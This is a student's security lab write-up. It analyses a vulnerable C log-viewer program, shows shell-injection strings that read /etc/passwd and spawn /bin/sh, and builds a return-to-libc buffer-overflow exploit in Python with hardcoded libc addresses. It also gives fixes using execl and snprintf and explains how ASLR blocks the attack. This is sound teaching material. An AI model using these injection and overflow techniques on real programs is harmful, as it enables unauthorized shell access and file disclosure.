# Security Vulnerability Assessment - Lab 3
Aaron Boyd

## Assignment
You must identify and provide a POC example of the following two
vulnerabilities from this program:
1. Data leakage vulnerability (can you dump file contents outside of /var/log)?
2. Stack smash + program return/flow control to execute an arbitrary program
   from within the code (can you get the program to cause a shell like /bin/sh
   to be executed from within?)

## What to Include
1. Evaluation of the source code, including identifying lines where the
   vulnerabilities are introduced in the C code
2. Document what command line argument can be used to cause it to display files
   outside /var/log/
3. Document what could be changed to mitigate this
4. Document what command line argument successfully yielded a shell execution
5. Document evidence that you got the shell (the "pstree" program would be
   useful here)
6. Use a debugger (like gdb) to show how the stack is smashed and how you've
   directed program flow in show_logs and/or run_wrapper
7. Document what could be changed to mitigate this
8. Turn ASLR back on and describe how the stack behavior changed to reduce the
   effectiveness of the attack

---

## Code Sample
```c
01  #include <stdio.h>
02  #include <unistd.h>
03  #include <stdlib.h>
04
06  int run_wrapper(char *cmd) {
07      system(cmd);
08  }
09
10  void show_logs(char *cmd, char *logfile) {
11      char buffer[100];
12
13      sprintf(buffer, "%s /var/log/%s", cmd, logfile);
14
15      run_wrapper(buffer);
16  }
17
18  int main(int argc, char **argv) {
20      printf("Display the log file\n");
21
22      if(argc < 2) {
23          printf("Usage: %s <log-file>\n\n", argv[0]);
24          exit(1);
25      }
26
27      show_logs("/usr/bin/tail", argv[1]);
28  }
```

## Code Evaluation
Main attack vector will be through `argv[1]` as this is the only way to get
user-input.

`logfile` parameter in `show_logs()` can be used to chain commands together
using `;`, `&`, or `&&`. This might look something like:

`run_wrapper("/usr/bin/tail /var/log/hello.txt; /usr/bin/tail /etc/passwd");`

as a result of the following:

`$ ./lab3ex "hello.txt; /usr/bin/tail /etc/passwd"`

This technique also opens up the possibility to get a shell with something
like:

`run_wrapper("/usr/bin/tail /var/log/hello.txt; /bin/sh");`

as a result of the following:

`$ ./lab3ex "hello.txt; /bin/sh"`

The use of `sprintf()` into `buffer[100]` is also vulnerable because `buffer`
can
easily be overflowed by `logfile` if `logfile` is too big.

---

## Display Files Outside /var/log
![Display files outside of /var/log](./images/display_other_files.png "Display files outside of /var/log")

<center>(Figure 1: Display files outside of /var/log)</center>

### Displaying Files Outside /var/log Fix
To fix the chaining of commands to view other files I would recommend using
the

```c
int execl(const char *pathname, const char *arg, (char *)NULL);
```

function like this:

```c
void show_logs(char *cmd, char *logfile)
{
    char buffer[100];
    sprintf(buffer, "/var/log/%s", logfile);
    execl(cmd, cmd, buffer, NULL);
}
```

This way, if an attacker were to supply input like:

`./lab3ex "hello.txt; /usr/bin/tail /etc/passwd"`

the string "hello.txt; /usr/bin/tail /etc/passwd" is treated as a single
argument instead of being able to escape the previous command and run a new
one.

With the `execl()` function, the above code would look for the file
"hello.txt; /usr/bin/tail /etc/passwd" which is not a file so it would fail
(see Figure 2).

![Display files outside of /var/log fix](./images/display_other_files_fix.png "Display files outside of /var/log fix")

<center>(Figure 2: Display files outside of /var/log fix)</center>

---

## Shell Execution
Shell execution can be accomplished in two ways:
1. Bash command chaining
2. Return-to-libc attack

### Bash Command Chaining Vulnerability
Getting a shell by chaining bash commands is very easy using the same
vulnerability from earlier (see Figure 3).

![Get a shell by chaining bash commands](./images/get_a_shell.png "Get a shell by chaining bash commands")

<center>(Figure 3: Get a shell by chaining bash commands)</center>

### Bash Command Chaining Vulnerability Fix
This can be avoided by using the fix from the **Displaying Files Outside
/var/log Fix** section.

---

### Return-to-libc Vulnerability
The return-to-libc attack takes advantage of the unrestrained write into
`buffer[100]` in `show_logs()`'s use of `sprintf()`. C does not perform bounds
checking so `sprintf()` is free to write as many bytes to memory as it wants.
In the line:

```c
sprintf(buffer, "%s /var/log/%s", cmd, logfile);
```

there is no control over `cmd` because it is hardcoded as `/usr/bin/tail`.
`logfile`, however, can be manipulated by the user.

In order to get a shell using return-to-libc, two things must be found in
memory while the program is running:
1. `system()`'s location in libc
2. The string "/bin/sh" in libc

#### Setup
Turning off ASLR makes this a very easy task because libc will be in the same
place each time the program is run. The location of `system()` can be found in
memory with the `p system` gdb command. (see Figure 4).

![Getting location of `system` in libc](./images/location_of_system.png "Getting location of `system` in libc")

<center>(Figure 4: Getting location of system() in libc)</center>

For some reason, libc always has the string "/bin/sh" in it. Finding it also
very easy with gdb. The command `info proc map` will display where libc is in
memory (see Figure 5).

![Getting location of libc](./images/location_of_libc.png "Getting location of libc")

<center>(Figure 5: Getting location of libc)</center>

From here, memory can be searched through for the string "/bin/sh" in the
ranges that libc occupies with the gdb `find` command (see Figure 6).

![Getting location of "/bin/sh"](./images/location_of_bin_sh.png "Getting location of \"/bin/sh\"")

<center>(Figure 6: Getting location of "/bin/sh")</center>

#### How does `system()` work?
In order to call `system()` the return address of `show_logs()`'s stack-frame
must be overwritten to be the address of `system()`. This is easy to do by
overflowing `buffer[100]` with the address of `system()` somewhere in
`logfile`, however, this would fail because the stack would not be setup
properly when entering `system()` (i.e. parameters would be missing). To see
how `system()` expects it's stack to look, a simple C program that calls
`system("/bin/sh");` can be debugged with gdb.

```c
#include <stdlib.h>

int main()
{
    system("/bin/sh");
}
```

In Figure 7, it can be seen that at the entry of `system()` the stack has the
return address and then a pointer to the string "/bin/sh".

![Entry of `system`](./images/beginning_of_system.png "Entry of `system`")

<center>(Figure 7: Entry of system())</center>

This means in order to call `system()` properly, there must be a return address
and a pointer to "/bin/sh" in the buffer overflow.

#### Exploit
A simple python script can be used to craft an exploit. The first objective
is to overwrite the return address in `show_logs()`'s stack-frame. To do this,
python can be used to fill `buffer[100]` until it corrupts the return address.

This is because the return address sits below `show_logs()`'s local variables
(`buffer[100]`) and the old stack-frame's base address.

```
-------------------- low addresses
| buffer[100]      |
--------------------
| local variables  |
--------------------
| old base address |
--------------------
| return pointer   |
-------------------- high addresses
```

```python
# File: solve.py
import sys
buffer_len = 116
sprintf = '/usr/bin/tail /var/log/'.format(exe)
padding_len = buffer_len - len(sprintf)
payload = 'A' * padding_len
sys.stdout.write(payload)
```

`$ ./lab3ex $(python solve.py)`

![Corrupt return address](./images/corrupt_return_address.png "Corrupt return address")

<center>(Figure 8: Corrupt return address)</center>

It can be seen in Figure 8 that the return address was corrupted with
0x41414141. buffer_len can tweaked until it overwrites until right before the
return address. In this case, the correct number of bytes is 112.

One thing to note, the `leave` and `ret` instructions really do this:

```
mov esp,ebp
pop ebp
pop eip
```

This essentially:
1. Tears down the stack (`mov esp,ebp`)
2. Sets `ebp` to the base address of the caller function's stack-frame (`pop ebp
   `)
3. Restores the instruction pointer for the caller function's stack-frame (`pop
   eip`)

The order in which to write the new values to the stack is:
1. Address of `system()`
2. Random return address (0x43434343)
3. Address of "/bin/sh"

This is because when `show_logs()` tears down it's stack-frame and gets ready
to execute `ret`, `esp` will be pointing at the return address (`system()`).
The `ret` instruction will `pop eip` and this will increment `esp`. If the
random return address and the address of "/bin/sh" are right below that return
address then `esp` will now be pointing at the random return address and be
ready for the "jump" to `system()`.

It is done this way because by hijacking the `ret` instruction to arbitrarily
jump to `system()`, there is not the luxury of a `call` pushing a return
address on the stack. There also isn't the code to push the address of
"/bin/sh" onto the stack so it just has to be written there with `sprintf()`.

```python
# File solve.py
import struct
import sys

def u32(num):
    # Convert num to 4-byte little-endian
    return struct.pack('I', num)

buffer_len = 112
sprintf = '/usr/bin/tail /var/log/'
padding_len = buffer_len - len(sprintf)
payload = 'A' * padding_len

system      = u32(0xf7e149e0) # address of system()
rand_ret    = u32(0x43434343) # random return value
bin_sh      = u32(0xf7f54aaa) # address of "/bin/sh"

payload += system + rand_ret + bin_sh
sys.stdout.write(payload)
```

The reason one can get away with pushing a random return address on the stack
is that once a shell is gained, it does not matter what happens after the shell
is closed. The program will try to return to 0x43434343 and seg-fault but at
that point the shell has already run to completion and the attack was
successful.

Running this script results in a shell (see Figure 9).

![Getting shell with return-to-libc](./images/return_to_libc_getting_shell.png "Getting shell with return-to-libc")

<center>(Figure 9: Getting shell with return-to-libc)</center>

In gdb, it can be seen that before `show_logs()` executes `ret` that the return
address has been overwritten with the address of `system()`, the random return
address is below that, and the address of "/bin/sh" is right below that
(see Figure 10).

![show_logs function before ret](./images/return_to_libc_gdb_show_logs.png "show_logs function before ret")

<center>(Figure 10: show_logs function before ret)</center>

After `show_logs()` executes `ret`, `system()` is entered and "/bin/sh" is
popped
off the stack into `eax` (see Figure 11).

![system function](./images/return_to_libc_gdb_system.png "system function")

<center>(Figure 11: system function)</center>

### Return-to-libc Vulnerability Fix
To prevent a buffer overflow and potential return-to-libc attack, I would use
the

```c
snprintf(char *str, size_t size, const char *format, ...)
```

function. This will restrict the number of bytes that are allowed to be written
to `buffer[100]`.

`show_logs()` with both fixes looks like:

```c
void show_logs(char *cmd, char *logfile)
{
    char buffer[100];
    snprintf(buffer, 100, "/var/log/%s", logfile);
    execl(cmd, cmd, buffer, NULL);
}
```

Now the `solve.py` script is unable to overflow `buffer` and return to libc
(see Figure 13).

![Return-to-libc fix](./images/return_to_libc_fix.png "Return-to-libc fix")

<center>(Figure 13: Return-to-libc fix)</center>

---

## Effects of Enabling ASLR
Enabling ASLR makes the return-to-libc attack MUCH harder. Without a way to
leak memory at run-time and change input accordingly, it is not possible to
determine where libc is in memory. Therefore, it is not possible to know the
addresses of `system()` and "/bin/sh" prior to running the program. This can be
seen if the program is run in gdb and given output from the previous exploit
script. Right before `show_logs()` executes `ret`, the address of `system()`
and "/bin/sh" should be at `esp+4` and `esp+8`. However, with ASLR enabled, the
return address is a random function `fts_read()` and the address that should
point to "/bin/sh" is not even valid memory (see Figure 14).

![Return-to-libc failure in gdb](./images/return_to_libc_failure_gdb.png "Return-to-libc failure in gdb")

<center>(Figure 14: Return-to-libc failure in gdb)</center>

